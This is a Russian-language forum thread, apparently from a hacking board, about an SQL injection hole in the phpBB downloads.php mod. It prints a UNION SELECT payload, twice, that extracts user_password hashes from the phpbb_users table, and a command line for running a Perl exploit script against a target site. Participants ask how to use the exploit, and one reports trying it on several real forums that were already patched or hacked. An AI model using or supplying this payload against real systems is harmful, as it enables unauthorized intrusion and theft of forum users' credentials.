Бедный, всеми измученный форум, и опять дыра =)

Читаем тут:

http://www.securitylab.ru/53767.html

Угагагаааа))))) Ваще кранты =0)) Они же разорятся!

downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0 %20FROM%20phpbb_users%20WHERE%20user_id=$user_id/*

а разве модуль downloads встроен во все форумы?

Пример

C:\>phpbb.pl www.site.com /phpBB2/ 2

В Выполнить это вообще писать? или как. если адрес форума www.site.com/phpBB2/index.php
И как понимать вообще знак ">"

а как этим пользоваться?)))

Блин!!! Несколько форумов перебрал все закрыты или
ужэ взломаны!!!Обьясните мож я чо не то делаю???
downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0 %20FROM%20phpbb_users%20WHERE%20user_id=2/*
Вот сплойт вставляю я его в адрес но не х не получается:
ДОКУМЕНТ НЕ НАЙДЕН!!!!!!!!!!

lol. Это однас тсрочка только из сплойта =) Внимательнее читай просто :)

Эта дыра только в МОДЕ downloads.php, а он почти нигде не используется.

А где можно закачать этот мод? Дайте ссылочку.